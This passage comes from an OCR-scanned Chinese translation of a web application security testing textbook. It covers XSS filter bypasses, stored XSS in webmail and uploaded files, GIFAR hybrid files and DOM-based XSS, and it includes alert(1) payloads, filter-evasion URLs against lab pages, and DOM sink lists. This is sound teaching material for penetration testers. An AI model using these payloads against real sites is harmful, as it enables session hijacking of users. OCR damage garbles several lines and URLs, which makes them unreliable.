多 个 参数 ， 就 可 以 将 攻击 从 一 个 参数 传递 到 另 一 个 参数 〈 如 用 于 突破 长 
度 限 制 的 技巧 中 所 述 ) 。 如 果 可 以 将 XSS 有 效 载荷 分 割 成 几 块 ， 则 其 中 
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阻止 攻击 。 

口 由 于 性 能 原因 ， 该 过 滤器 仅 检 查 跨 域 请 求 。 因 此 ， 如 果 攻 击 者 能 
够 使 用 户 同 XSS URL 提 出 “本 地 ”请 求 ， 过 滤器 将 无 法 阻止 这 种 攻击 。 通 
常 ， 如 果 应 用 程序 包含 任何 行为 ， 允 许 攻 击 者 在 由 其 他 用 户 查 看 的 页 面 
中 注入 任意 链接 ， 这 种 攻击 即 成 为 可 能 (虽然 这 本 身 也 属于 反射 型 攻 
击 ， 但 XSS 过 滤器 仅 尝 试 阻 止 注入 的 脚本 ， 而 不 是 注入 的 链接 )， 。 在 这 
种 情况 下 ， 攻 击 者 需要 完成 两 个 步 又: 在 用 户 的 页 面 中 注入 恶意 链接 ; 
用 户 单 击 链 接 并 收 到 XSS 有 效 载 答 。 

其 次 ， 在 某 些 情况 下 ， 可 以 利用 浏览 器 和 服务 器 的 特殊 行为 来 避 开 
XSS 过 滤器 。 

口 如 你 所 见 ， 浏 览 器 在 处 理 HTML 时 接受 各 种 类 型 的 异常 字符 和 语 
法 。 例 如 ， 正 本 映 就 接受 NULL 字 节 。 有 时 ， 攻 击 者 可 以 利用 下 的 这 种 
古怪 行为 来 避 开 它 的 XSS 过 滤器 。 

口 如 第 10 章 所 述 ， 在 请 求 包含 多 个 同名 参数 时 ， 应 用 程序 服务 器 的 
行为 各 不 相同 。 在 某 些 情况 下 ， 它 们 会 串联 收 到 的 所 有 值 。 例 如 ， 在 
ASP.NET 中 ， 如 果 查 询 字 符 串 包含 : 


Pl=foogpl=bar 


传递 给 应 用 程序 的 参数 
pl 的 值 为 : 


pl=foo, bar 


与 之 相反 ， 即 使 参数 的 名 称 相 同 ， 但 了 正 XSS 过 小 器 仍然 会 单独 处 理 
每 个 参数 。 这 种 行为 差异 使 得 攻击 者 能 够 轻松 在 儿 个 相同 名 称 的 “不 
同 * 请 求 参数 之 间 传 递 XSS 有 效 载 和 ， 从 而 避 开 针对 每 个 单独 的 值 的 黑 
名 单 过 滤 〈 因 为 服务 器 已 将 它们 串联 起 来 ) 。 











尝试 访问 


当前 ， 以 下 XSS 攻 击 可 成 功 避 开 IE XSS 过 滤器 : 
http://mdsec.net/error/5/Error.ashx?message=<scr % 00ipt 
% 20&message=> alert('xss')</script> 


再 次 ， 通 过 利用 该 过 滤器 净化 应 用 程序 响应 中 的 脚本 代码 的 方式 ， 
可 以 实施 通过 其 他 方法 无 法 实施 的 攻击 。 之 所 以 会 出 现 这 种 情况 ， 主 要 
是 因为 该 过 滤器 以 被 动 方式 运行 ， 仅 寻找 类 似 脚本 的 输入 与 类 似 脚本 的 
输出 之 间 的 关联 。 它 无 法 对 应 用 程序 进行 交互 性 探查 ， 以 确定 给 定 输入 
是 否 与 给 定 输出 相关 联 。 因 此 ， 攻 击 者 可 以 利用 该 过 滤器 净化 在 啊 应 中 
出 现 的 应 用 程序 自身 的 脚本 代码 。 如 果 攻 击 者 在 请 求 参 数值 中 包含 一 部 
分 现 有 脚本 ，IE XSS 过 滤器 在 请 求 和 响应 中 发 现 相 同 的 脚本 代码 ， 它 就 
会 修改 响应 中 的 脚本 ， 以 阻止 该 脚本 执行 。 

事实 证 明 ， 在 某 些 情况 下 ， 净 化 现 有 脚本 将 改变 包含 用 户 输 入 反射 
的 响应 的 后 续 部 分 的 语法 情境 。 这 种 情境 的 改变 意味 着 应 用 程序 自身 对 
反射 型 输入 的 过 滤 不 充分 。 因 此 ， 攻 击 者 可 以 利用 用 户 输入 反射 来 实施 
XSSH CURIE XSS 过 滤器 没有 修改 啊 应 ， 这 种 攻击 将 无 法 成 功 ) 。 
但 是 ， 能 够 实施 这 类 攻击 的 情形 通常 与 不 常用 的 功能 或 早期 版 本 的 下 
XSS 过 滤器 中 披露 的 缺陷 (已 修复 ) AK. 

更 重要 的 是 ， 由 于 攻击 者 可 以 选择 性 地 净化 应 用 程序 自身 的 脚本 代 
人 码 ， 因 此 ， 他 们 可 以 利用 这 种 “能 力 ”， 通 过 破坏 应 用 程序 安全 相关 的 控 
制 机 制 来 实施 全 然 不 同 的 攻击 。 一 个 常见 的 示例 是 删除 防御 性 的 
framebusting 代 码 〈 请 参 疯 第 13 章 了 解 详细 信息 ) ， 但 其 他 大 量 示例 主 
要 与 在 客户 端 执行 关键 的 安全 防御 任务 的 应 用 程序 专用 代码 有 关 。 




















确定 保存 型 XSS 漏 洞 的 过 程 与 前 面 描述 的 确定 反射 型 XSS 漏 洞 的 过 
程 有 很 多 相似 之 处 ， 都 包括 在 应 用 程序 的 每 一 个 进入 点 提交 一 个 特殊 字 
符 串 。 但 是 ， 这 两 个 过 程 之 间 也 存在 一 些 重 要 的 区 别 。 在 进行 测试 时 ， 
必须 记 住 这 些 区 别 ， 以 确定 尽 可 能 多 的 漏洞 。 





渗透 测试 步 又 


C1) 辣 应 用 程序 中 的 每 一 个 可 能 的 位 置 提交 一 个 特殊 的 字符 
串 后 ， 必 须 反 复 检查 应 用 程序 的 全 部 内 容 与 功能 ， 确 定 这 个 字符 串 
在 浏览 器 中 显示 的 任何 情况 。 在 某 个 位 置 ( 例 如 ,个 人 信息 页 面 的 
姓名 字段 ) 输入 用 户 控制 的 数据 ， 这 个 数据 可 能 会 在 应 用 程序 的 许 
多 不 同位 置 显示 《〈 例 如， 用 户主 页 上 、 注 册 用 户 列 表 中 、 任 务 等 工 
作 流 程 项 目 中 、 其 他 用 户 的 联系 列表 中 、 用 户 提 交 的 消息 或 问题 
中 、 应 用 程序 日 志 中 等 ) 。 应 用 程序 可 能 对 每 个 出 现 的 字符 串 实 施 
了 不 同 的 保护 性 过 滤 ， 因 此 需要 对 它们 进行 单独 分 析 。 

(2) 如 有 可 能 ， 应 检查 管理 员 能 够 访问 的 所 有 应 用 程序 区 
域 ， 确 定 其 中 是 否 存 在 任何 可 被 非 管 理 用 户 控制 的 数据 。 例 如 ， 应 
用 程序 一 般 允 许 管 理 员 在 浏览 器 中 检查 日 志文 件 。 这 种 类 型 的 功能 
极 有 可 能 包含 XSSs 漏 洞 ， 攻 击 者 通过 生成 含有 恶意 HIML 的 日 志 记 
录 即 可 对 其 加 以 利用 。 

(3) 在 向 应 用 程序 中 的 每 个 位 置 提 交 一 个 测试 字符 串 时 ， 并 
不 总 是 把 它 作 为 每 个 页 面 的 每 一 个 参数 这 样 简单 。 在 保存 被 提交 的 
数据 之 前 ， 许 多 应 用 程序 功能 需要 经 历 几 个 阶段 的 操作 。 例 如 ， 注 
册 新 用 户 、 处 理 购物 订单 、 转 账 等 操作 往往 需要 按 预 定 的 顺序 提交 


(4) 在 探查 反射 型 XSS 漏 铜 时 ， 应 该 注意 可 控 的 受害 者 请 求 
的 每 一 个 方面 。 包 括 请 求 的 所 有 参数 和 每 一 个 HITP 消 息 头 。 在 探 
碍 保存 型 XSS 漏 洞 时 ， 还 应 该 分 析 应 用 程序 用 于 接收 并 处 理 可 控 输 
入 的 任何 带 外 通道 。 任 何 这 类 通道 都 是 引入 保存 型 XSS 攻 击 的 适当 
攻击 向 量 。 同 时 ， 审 会 在 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 
第 4 章 了 解 相 关内 容 ) ， 确 定 每 一 个 可 能 的 受 攻击 面 。 

(5) 如 果 应 用 程序 允许 文件 上 传 与 下 载 ， 应 始终 探查 这 种 功 
能 是 否 易于 受到 保存 型 XSS 攻 击 。 我 们 将 在 本 章 后 面部 分 讨论 测试 
这 类 功能 的 详细 技巧 。 

(6) 充分 发 挥 想 象 ， 确 定 控 制 的 数据 是 否 可 通过 任何 其 他 方 
法 保存 在 应 用 程序 中 并 显示 给 其 他 用 户 。 例 如 ， 如 果 应 用 程序 的 搜 
索 功 能 显示 常用 的 搜索 项 列表 ， 束 可 以 通过 多 次 搜索 这 个 列表 ， 引 























入 保存 型 XSS 有 效 载荷 ， 即 使 主 搜索 功能 本 号 安全 地 处 理 输入 。 


确定 用 户 控制 的 数据 被 应 用 程序 保存 并 随后 在 浏览 右 中 显示 的 每 一 
种 情况 后 ， 应 当 遵 循 与 前 面 描述 的 探查 洪 在 的 反射 型 XSS 漏 洞 时 相同 的 
过 程 。 也 就 是 说 ， 决 定 需要 提交 哪些 输入 ， 以 在 周围 的 HIML 中 先入 有 
CH JavaScript, YA las eFC A a tat ÍT IE 





YY fem 在 探查 反映 型 XSS 漏 洞 时 ， 每 次 测试 一 个 参数 ， 并 
检查 每 个 啊 应 中 是 否 出 现 输入 ， 惑 可 以 轻易 确定 哪些 请 求 参数 易于 
受到 攻击 。 但 是 ， 在 探查 保存 型 XSS 漏 洞 时 ， 要 确定 这 一 点 并 不 容 
易 。 如 果 在 每 个 页 面 的 每 一 个 参数 提交 相同 的 测试 字符 吕 ， 那 么 你 
可 能 会 发 现 ， 这 个 字符 串 在 应 用 程序 的 许多 位 置 重 复出 现 ， 因 而 无 
法 准确 确定 每 个 出 现 的 字符 串 由 哪个 参数 负 贡 。 为 避免 出 现 这 个 问 
题 ， 在 探查 保存 型 XSS 时 ， 可 以 为 每 个 参数 所 交 一 个 不 同 的 测试 字 
符 串 ， 例 如 ， 把 测试 字符 串 与 它 提交 到 其 中 的 字段 名 称 连接 起 来 。 


在 测试 保存 型 XSS 漏 洞 时 ， 我 们 还 可 以 采用 一 些 特殊 的 技巧 。 在 下 
面 几 节 中 ， 我 们 将 详细 介绍 这 些 技巧 。 

1. 在 Web 邮 件 应 用 程序 中 测试 XSS 

如 前 所 述 ， 由 于 Web 邮 件 应 用 程序 将 直接 从 第 三 方 收 到 的 内 容 包 含 
在 同 用 户 显 示 的 应 用 程序 页 面 中 ， 因 此 ， 这 种 程序 本 丑 就 存在 着 保存 型 
XSS 攻 击 风 险 。 要 测试 这 种 功能 ， 应 该 在 该 应 用 程序 上 创建 自己 的 电子 
邮件 账户 ， 并 通过 电子 邮件 辣 自己 实施 大 量 XSS 攻 击 ， 然 后 在 该 应 用 程 
序 中 查看 每 封 邮件 ， 确 定 是 否 有 任何 攻击 取得 成 功 。 

为 彻底 完成 这 一 任务 ， 你 需要 通过 电子 邮件 发 送 各 种 反常 的 HTML 
内 容 (如 我 们 在 测试 避 开 输入 过 滤 的 方法 时 所 述 ) 。 如 果 仅 限于 使 用 标 
准 电 子 邮 件 客户 端 ， 你 可 能 会 发 现 ， 无 法 完全 控制 原始 的 邮件 内 容 ， 或 
者 邮件 客户 端 可 能 会 净化 或 “请 除 ” 你 有 意 设 计 的 畸形 语法 。 

在 这 种 情况 下 ， 最 好 是 采用 其 他 方法 来 生成 电子 邮件 ， 以 便于 直接 
控制 邮件 的 内 容 。 一 种 方法 是 使 用 UNIX sendmail 命 令 。 首 先 ， 需 要 使 
用 应 当 用 于 同 外 发 送 电 子 邮 件 的 邮件 服务 器 的 详细 信息 配置 电脑 ， 然 
a 以 在 文本 编辑 器 中 创建 原始 的 电子 邮件 ， 并 使 用 以 下 命令 发 送 该 
BAF: 









































sendmail -t test@example.org < email.txt 





以 下 为 原始 电子 邮件 文件 的 一 个 示例 。 在 消息 主体 中 测试 各 种 XSS 
有 效 载 和 荷 和 避 开 过 滤 的 机 制 时 ， 也 可 以 尝试 指定 不 同 的 Content-Type 和 


charset: 


MIME-Version: 1.0 

From: test@example.org 

Content-Type: text/html; charset=us-ascii 
Content-Transfer-Encoding: 7bit 

Subject: XSS test 


<html> 
<body> 
<img src=" ‘onerror=alert(1)> 
</body> 
</html> 


2. 在 上 传 文件 中 测试 XSS 

如 果 应 用 程序 允许 用 户 上 传 可 被 其 他 用 户 下 载 并 查看 的 文件 ， 就 会 
出 现 保 存 型 XSS 漏 润 ， 然 而 ， 这 种 漏洞 常常 被 人 们 和 忽略。 如 今 的 应 用 程 
序 通 常 都 提供 文件 上 传 功 能 ， 除 传统 的 用 于 文件 共享 的 工作 流 功 能 外 ， 
文件 还 可 以 通过 电子 邮件 附件 的 形式 传送 给 Web 邮 件 用 户 。 图 像 文 件 则 
可 以 附加 到 博客 文章 中 ， 并 且 可 以 用 作 定 制 的 头像 或 通过 相册 共享 。 
应 用 程序 是 否 易 于 受到 上 传 文 件 的 攻击 ， 取 决 于 许多 影响 因素 : 
口 在 文件 上 传 过 程 中 ， 应 用 程序 可 能 会 限制 可 以 上 传 的 文件 的 扩展 


口 在 文件 上 传 过 程 中 ， 应 用 程序 可 能 会 检查 文件 内 容 ， 以 确认 其 是 
人 盏 为 所 需 的 格式 ， 如 JPEG。 
口 在 文件 下 载 过 程 中 ， 应 用 程序 可 能 会 返回 Content-Type 消 息 头 ， 
以 指定 文件 所 包含 的 内 容 的 类 型 ， 如 image/jpeg。 
口 在 文件 下 载 过 程 中 ， 应 用 程序 可 能 会 返回 Content-Disposition 消 忆 
头 ， 以 指定 浏览 堪 应 将 文件 保存 到 磁盘 上 。 人 否则， 对 于 相关 的 内 容 类 
型 ， 应 用 程序 会 处 理 并 在 用 户 的 浏览 器 中 显示 文件 。 

在 测试 文件 上 传 功能 时 ， 首 先 你 应 该 尝试 上 传 一 个 包含 概念 验证 脚 
本 的 简单 HTML 文 件 。 如 有 果 该 文件 被 接受 ， 则 尝试 以 正常 方式 下 载 该 文 














件 。 如 果 应 用 程序 按 原样 返回 最 初 的 文件 ， 并 且 你 的 脚本 得 以 执行 ， 则 
应 用 程序 肯定 易于 受到 攻击 。 

如 果 应 用 程序 阻止 上 传 的 文件 ， 则 答 试 使 用 各 种 文件 扩展 名 ， 包 
括 .txt 和 .jpg。 如 果 在 你 使 用 其 他 扩展 名 时 ， 应 用 程序 接受 包含 HTML 的 
文件 ， 则 应 用 程序 可 能 仍然 易于 受到 攻击 ， 具 体 取 决 于 其 在 下 载 过 程 中 
如 何 传送 文件 。Web 邮 件 应 用 程序 通常 易于 受到 这 类 攻击 。 攻 击 者 可 以 
发 送 包含 诱 惑 性 图 像 附 件 的 电子 邮件 ， 如 果 用 户 碍 看 该 附件 ， 他 们 的 会 
话 将 被 攻破 。 

即使 应 用 程序 返回 Content-Type 消 息 头 ， 指 定 下 载 文件 应 为 图 像 ， 
但 是 ， 如 果 文 件 实际 包含 的 是 HTML 内 容 ， 一 些 浏览 器 仍然 会 将 该 文件 
作为 HTML 人 处 理 。 例 如 : 


HTTP/1.1 200 OK 
Content-Length: 25 
Content-Type: image/jpeg 








<script>alert (1)</script> 


旧版 的 Internet Explorer 就 存在 这 种 缺陷 。 如 果 用 户 直接 请 求 一 个 
JPEG 文 件 (并非 通过 舱 入 式 <img> 标 签 ) ， 那 么 在 收 到 上 述 啊 应 时 ，IE 
会 将 该 文件 的 内 容 当 做 HIML 处 理 。 虽 然 这 种 缺陷 已 经 得 到 修复 ， 但 将 
来 在 其 他 浏览 器 中 也 可 能 会 出 现 此 类 缺陷 。 

@ 混合 文件 攻击 

通常 ， 为 防范 上 述 攻 击 ， 应 用 程序 会 对 上 传 文件 的 内 容 执行 某 种 确 
认 ， 以 确保 其 确实 包含 所 需 格式 的 数据 ， 如 图 像 。 但 是 ， 使 用 “混合 文 
a 
施 了 

Billy Rios 设 计 的 GIFAR 文 件 就 是 一 种 常见 的 混合 文件 。GIFAR 文 件 
包含 GIF 图 像 格式 和 JAR (Java 档 案 ) 格式 的 数据 ， 并 且 是 这 两 种 格式 的 
这 是 因为 ， 了 GIF 格 式 相 关 的 文件 元 数据 位 于 文件 的 开始 

与 JAR 格 式 相 关 的 元 数据 则 位 于 文件 的 结尾 部 分 。 因 此 ， 如 果 应 用 
LE ei 那么 ， 在 确认 上 传 文件 的 内 容 时 ， 该 应 
用 程序 也 会 接受 GIFAR 文 件 。 

通常 ， 使 用 GIFAR 文 件 实 施 的 上 传 文件 攻击 由 以 下 步骤 组 成 。 

口 攻击 者 发 现 由 一 名 用 户 上 传 的 GIF 文件 可 由 其 他 用 户 下 载 〈 如 社 
区 网 络 应 用 程序 中 的 用 户头 像 ) 的 应 用 程序 功能 。 





口 攻 击 者 构建 一 个 GIFAR 文 件 ， 在 其 中 包含 一 段 Java 代 码 ， 用 于 动 
持 任 何 执行 该 代码 的 用 户 的 会 话 。 

口 攻击 者 将 该 文件 作为 他 的 头像 上 传 。 因 为 其 中 包含 有 效 的 GIF 图 
像 ， 应 用 程序 将 接受 该 图 像 。 

口 攻击 者 确定 可 利用 上 传 的 文件 对 其 实施 攻击 的 适当 外 部 网 站 。 该 
网 站 可 能 为 攻击 者 上 自己 的 网 站 ， 或 允许 用 户 创 建 任 意 HIML (如 博客 ) 
的 第 三 方 站 点 。 

口 在 该 外 部 网 站 上 ， 攻 击 者 使 用 <applet> 和 <object> 标 签 从 上 述 社 交 
网 络 站 点 以 Java applet 的 形式 上 传 GIFAR 文 件 。 

口 如 果 用 户 访 问 该 外 部 站 点 ， 攻 击 者 的 Java applet 将 在 其 浏览 器 中 
执行 。 与 包含 正常 脚本 的 文件 不 同 ， 在 过 到 Java applet 时 ， 同 源 策略 的 
执行 方式 会 有 所 不 同 。Java applet 将 被 视 为 属于 加 载 它 的 域 ， 而 不 是 调 
用 它 的 域 。 因 此 ， 攻 击 者 的 applet 将 在 社交 网 络 应 用 程序 的 域 中 执行 。 
如 果 受 害 用 户 在 受到 攻击 时 已 登录 该 社交 网 络 应 用 程序 ， 或 者 最 近 曾 登 
录 访 应 用 程序 并 选中 了 “保持 登录 状态 ”(stay logged in) 选项 ， 则 攻击 
者 的 applet 将 完全 控制 受害 用 户 的 会 话 ， 从 而 侵入 该 用 户 。 

当前 版 本 的 Java 浏 览 器 插件 通过 确认 所 加 载 的 JAR 文 件 是 否 包 含混 
合 内 容 ， 从 而 阻止 了 这 种 使 用 GIFAR 文 件 的 特殊 攻击 。 但 是 ， 使 用 混合 
文件 隐藏 可 执行 文件 的 原理 仍然 适用 。 鉴 于 当前 所 使 用 的 客户 病 可 执行 
代码 格式 的 范围 不 断 扩大 ， 攻 击 者 或 许可 以 以 其 他 格式 ， 或 在 将 来 通过 
其 他 方式 实施 类 似 的 攻击 。 

@ 在 通过 Ajax 上 传 的 文件 中 测试 XSS 

一 些 应 用 程序 使 用 Ajax 来 检索 和 呈现 在 片段 标识 符 之 后 指定 的 
URL。 例 如 ， 应 用 程序 的 页 面 中 可 能 包含 以 下 链接 : 

http://wahh-app.com/#profile 

当 用 户 日 击 此 链接 时 ， 客 户 病 脚本 将 处 理 单 击 事件 ， 使 用 Ajax 来 检 
索 在 片段 标识 符 之 后 显示 的 文件 ， 并 在 现 有 页 面 中 的 <div> 元 素 的 
innerHtml 中 设置 响应 。 这 样 可 提供 无 颖 的 用 户 体 验 ， 因 为 单 击 用 户 界 面 
中 的 选项 卡 将 更 新 所 显示 的 内 容 ， 而 无 须 重新 加 载 整个 页 面 。 

在 这 种 情况 下 ， 如 果 应 用 程序 还 包含 其 他 允许 上 传 和 下 载 图 像 文 件 
《如 用 户头 像 ) 的 功能 ， 你 就 可 以 上 传 一 个 包含 谋 入 式 HIML 标 记 的 有 
效 图 像 文 件 ， 并 构建 以 下 URL， 使 客户 端 代码 提取 该 图 像 并 将 其 作为 
HTML 显 示 : 

http://wahh-app.com/#profiles/images/15234917624.jpg 

HTIMLY Wik ASIA AACS a, LPR ARE 
分 。 一 些 浏览 器 ， 包 括 Firefox 和 Safari， 乐 于 将 图 像 文件 以 HTML 格 式 显 
示 。 图 像 的 二 进 制 部 分 将 显示 为 乱码 ， 而 任何 能 入 的 HIML 将 正常 显 














V ”提示 ”假设 潜在 的 受害 者 使 用 的 是 兼容 HTML5 的 浏览 器 ， 
如 果 所 请 求 的 域 许 可 ， 该 浏览 器 可 用 于 跨 域 传送 Ajax 请 示 。 在 这 种 
情况 下 ， 另 一 种 可 能 的 攻击 方法 ， 是 在 片段 标识 符 后 面 放置 一 个 绝 





对 URL， 指 定 一 个 位 于 可 与 目标 域 进行 Ajax 交 互 的 服务 器 上 的 、 完 
全 由 攻击 者 控制 的 外 部 HTML 文 件 。 如 果 客 户 端 脚本 不 确认 所 请 示 
的 URL 是 否 在 同一 个 域 上 ， 客 户 端 远程 文件 包含 攻击 将 取得 成 功 。 

由 于 旧版 HTML 并 不 需要 对 URL 的 域 进行 此 类 确认 ， 因 此 ， 
HTML5 中 对 域 确认 所 做 的 更 改 可 能 会 给 此 前 安全 的 应 用 程序 造成 
可 利用 的 漏洞 。 





使 用 以 下 方法 无 法 确定 基于 DOM 的 XSS 漏 洞 : 提交 一 个 特殊 的 字符 
串 作 为 每 个 参数 ， 然 后 监控 响应 中 是 否 出 现 该 字符 串 。 

确定 基于 DOM 的 XSS 漏 洞 的 基本 方法 是 ， 用 浏览 器 手动 浏览 应 用 程 
序 ， 并 修改 每 一 个 URL 参 数 ， 在 其 中 插入 一 个 标准 测试 字符 串 ， 例 如 : 


"<script>alert (1)</script> 
"valere tl 77 
'-alert(1)-' 


通过 在 浏览 器 中 显示 每 一 个 返回 的 页 面 ， 可 以 执行 所 有 客户 端 脚 
本 ， 并 在 必要 时 引用 经 过 修改 的 URL 参 数 。 只 要 包含 cookie 的 对 话 框 出 
现 ， 就 表示 发 现 了 一 个 漏洞 〈 可 能 为 基于 DOM 的 或 其 他 类 型 的 XSS 漏 
WA) 。 使 用 本 身 提 供 JavaScript 解 释 器 的 工具 甚至 可 以 上 自动 完成 这 个 过 


程 。 

然而 ， 这 种 基本 的 方法 并 不 能 确定 所 有 基于 DOM 的 XSS 漏 洞 。 如 上 
文 所 述 ， 在 HIML 文 档 中 注入 有 效 JavaScript 所 需 的 准确 语法 ， 取 决 于 用 
户 可 控制 的 字符 串 插入 点 前 后 已 经 存在 的 语法 。 这 时 ， 可 能 需要 终止 被 
单 引 号 或 双 引 号 引用 的 字符 串 ， 或 者 结束 特定 的 标签 。 有 时 可 能 需要 插 

















入 新 标签 ， 但 有 时 并 不 需要 。 客 户 端 应 用 程序 代码 可 能 会 尝试 确认 通过 
DOM 获 得 的 数据 ， 但 它 仍 然 易 于 受到 攻击 。 

即使 应 用 程序 可 能 易于 受到 精心 设计 的 攻击 ， 但 如 果 插 入 标准 测试 
字符 串 仍 不 能 得 到 有 效 的 语法 ， 那 么 代入 式 JavaScript 将 不 会 执行 ， 因 此 
也 不 会 有 对 话 框 出 现 。 由 于 无 法 在 每 个 参数 中 提交 每 一 种 可 能 的 XSS 攻 
击 字 符 串 ， 这 种 基本 的 探查 方法 必然 会 遗漏 大 量 的 漏洞 。 

确定 基于 DOM 的 XSS 漏 洞 的 一 种 更 加 有 效 的 方法 ， 是 检查 所 有 客户 
端 JavaScript， 看 其 中 是 否 使 用 了 任何 可 能 会 导致 漏洞 的 DOM 属 性 。 有 
大 量 工具 可 用 于 自动 完成 这 个 测试 过 程 。 其 中 一 个 有 用 的 工具 为 
DOMTracer， 下 载 该 工具 的 URL 如 下 所 示 : 

www.blueinfy.com/tools.html 














渗透 测试 步 又 


使 用 在 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 第 4 章 了 解 相 
RAE) ， 检 查 每 一 段 客 户 端 JavaScript， 看 其 中 是 否 出 现 以 下 
API， 它 们 可 用 于 访问 通过 一 个 专门 设计 的 URL 控 制 的 DOM 数 据 : 
口 document.1ocation 
口 document.URL 
口 document. URLUnencoded 
口 document.referrer 
D window. location 
确保 检查 出 现在 静态 HTML 页 面 及 动态 生成 的 页 面 中 的 脚本 ， 
无 论 页 面 为 何 种 类 型 ， 或 者 是 否 有 参数 被 提交 给 页 面 ， 任 何 使 用 脚 
本 的 位 置 都 可 能 存在 基于 DOM 的 XSS 漏 洞 。 

在 每 一 个 使 用 上 述 API 的 位 置 ， 仔 细 检 碍 那里 的 代码 ， 确 定 应 
用 程序 如 何 处 理 用 户 可 控制 的 数据 ， 以 及 是 否 可 以 使 用 专门 设计 的 
输入 来 执行 任意 JavaScript。 尤 其 注意 检查 并 测试 控制 的 数据 被 传送 
至 以 下 任何 一 个 API 的 情况 : 

口 document.write() 

D document.writeln() 

DQ document.body.innerHtml 
D eval() 

D window.execScript() 

O window.setInterval() 

O window.setTimeout() 























AY IF 


http://mdsec.net/error/18/ 
http://mdsec.net/error/22/ 
http://mdsec.net/error/28/ 
http://mdsec.net/error/31/ 
http://mdsec.net/error/37/ 
http://mdsec.net/error/41/ 
http://mdsec.net/error/49/ 
http://mdsec.net/error/53/ 
http://mdsec.net/error/56/ 
http://mdsec.net/error/61/ 


和 和 碍 找 反 射 与 保存 型 XSS 漏 洞 时 一 样 ， 应 用 程序 可 能 会 执行 各 种 过 
小 ， 壬 试 阻止 相关 攻击 。 通 常 ， 这 些 过 小 应 用 于 客户 痢 ， 因 此 ， 可 以 直 
接 查 看 其 确认 代码 ， 以 了 解 其 工作 机 制 ， 并 答 试 确定 任何 避 开 过 滤 的 方 
法 。 上 文 介绍 的 用 于 避 开 针对 反射 型 XSS 攻 击 的 过 滤 技 巧 在 此 处 同样 适 
用 。 


Al, yn vw) 

笑 试 访问 
http://mdsec.net/error/92/ 
http://mdsec.net/error/95/ 
http://mdsec.net/error/107/ 


http://mdsec.net/error/109/ 
http://mdsec.net/error/118/ 


某 些 情况 下 ， 服 务 器 端 应 用 程序 可 能 会 实施 旨 在 阻止 基于 DOM 的 
XSS 攻 击 的 过 滤 。 即 使 客户 端 出 现 易 受 攻击 的 操作 ， 服 务 器 并 不 在 啊 应 
中 返回 用 户 提 交 的 数据 ， 但 是 URL 仍 然 被 提交 给 了 服务 器 ， 因 此 ， 当 应 
用 程序 检测 到 恶意 有 效 载荷 时 ， 它 会 对 数据 进行 确认 ， 且 不 会 返回 易 受 
攻击 的 客户 端 脚本 。 

如 果 遇 到 这 种 防御 ， 渗 透 测 试 员 应 该 尝试 使 用 前 面 在 查找 反射 型 
XSS 漏 洞 时 描述 的 每 一 种 可 能 避 开 过 滤 的 攻击 方法 ， 测 试 服 务 器 数据 确 
认 机 制 的 可 靠 性 。 除 这 些 攻击 外 ， 还 有 几 种 专门 针对 基于 DOM 的 XSS 漏 
洞 的 技巧 可 用 于 帮助 攻击 有 效 载 集 避 开 服 务 器 端 确 认 。 

当 客 户 端 脚本 从 URL 中 提取 参数 值 时 ， 它 们 很 少将 查询 字符 串 正 确 
解析 成 名 / 值 对 。 相 反 ， 它 们 通 芝 会 在 URL 中 搜索 后 面 紧 跟着 等 号 〈=) 
的 参数 名 称 ， 然 后 提取 出 等 号 以 后 直到 URL 结 束 位 置 的 内 容 。 这 种 行为 
能 够 以 两 种 方式 加 以 利用 : 

口 如 果 服 务 器 根据 每 个 参数 而 不 是 整个 URL 应 用 确认 机 制 ， 那 么 可 
aa athe eee tere eget ae 
多 如 : 


nttp://mdsec.net/error/76/Error.ashx?message=Sorry%2c+anterror+occurr 


这 时 ， 虚 构 的 参数 被 服务 器 忽略 ， 因 此 不 会 受到 任何 过 涯 。 但 是 ， 
因为 客户 端 脚本 在 查询 字符 捍 中 搜索 message=， 并 提取 其 后 的 全 部 内 
容 ， 所 以 它 处 理 的 字符 捉 中 正好 包含 该 有 效 载 集 。 

口 如 果 服 务 絮 对 整个 URL 而 不 仅仅 是 消 姑 参数 应 用 确认 机 制 ， 仍 然 
人 
H: 


http://mdsec.net/error/82/Error.ashx?message=Sorryt2c+anterrort 


occurred#<script>alert (1)</script> 


这 时 ， 片 断 字 符 串 仍然 属于 URL 的 一 部 分 ， 因 此 被 保存 在 DOM 
中 ， 并 由 易 受 攻击 的 客户 端 脚 本 处 理 。 但 是 ， 由 于 浏览 费 并 不 将 URL 中 
的 片断 部 分 提交 给 服务 器 ， 因 此 攻击 字符 串 不 会 传送 到 服务 器 中 ， 因 而 
不 会 被 任何 服务 絮 痢 过 小 所 阻止 。 因 为 客户 病 脚 本 提取 message= 后 面 的 
全 部 内 容 ， 所 以 有 效 载荷 仍然 被 复制 到 HTML 页 面 源 代 码 中 。 


Al, yn vw) 

笑 试 访问 
http://mdsec.net/error/76/ 
http://mdsec.net/error/82/ 





= 错误 观点 “我 们 检查 每 个 用 户 请 求 中 是 否 存 在 艇 入 式 脚 本 
标签 ， 因 此 不 可 能 受到 XSS 攻 击 。” 

"o 过 滤 是 否 可 行 外 ， 现 在 可 以 找到 3 个 原因 证 明 这 种 看 法 
fy 

口 在 一 些 XSS 漏 洞 中 ， 攻 击 者 控制 的 数据 被 直接 插入 到 现 有 的 
JavaScript 脚 本 中 ， 因 此 攻击 者 不 需要 使 用 任何 脚本 标签 ， 或 采用 其 
他 方法 引入 脚本 代码 。 在 其 他 情况 下 ， 仍 然 不 需要 使 用 任何 脚本 标 
签 ， 只 需 注 入 一 个 包含 JavaScript 的 事件 处 理 器 即 可 。 

口 如 果 应 用 程序 接受 通过 带 外 通道 传送 的 数据 ， 并 在 它 的 web 
界面 中 显示 这 些 数据 ， 那 么 攻击 者 不 用 使 用 HTTP 提 交 任 何 恶 意 有 
效 载 荷 ， 就 可 以 利用 任何 保存 型 XSS 漏 洞 。 

口 针对 基于 DOM 的 XSS 漏 洞 的 攻击 不 需要 回 服 务 吉 提交 任何 恶 
意 有 效 载 集 。 如 果 使 用 片断 拉 巧 ， 那 么 有 效 载荷 将 始终 位 于 客户 


站 。 











aE 


一 些 应 用 程序 使 用 更 加 复杂 的 客户 端 脚 本 ， 对 查询 字 符 串 进行 更 加 
产 格 的 解 机。 例如 ， 它 在 URL 中 搜索 后 面 紧 跟着 等 号 的 参数 名 称 ， 然 后 
提取 等 号 后 面 的 内 容 ， 直 到 过 到 一 个 分 隔 符 ， 如 && 或 #。 在 这 种 情况 
a ei RV ld 


http: ndsec error/79/Error.ashx?foomessage=<script>alert (1)</script 


sage=Sorryt2c+an+error+occurred 





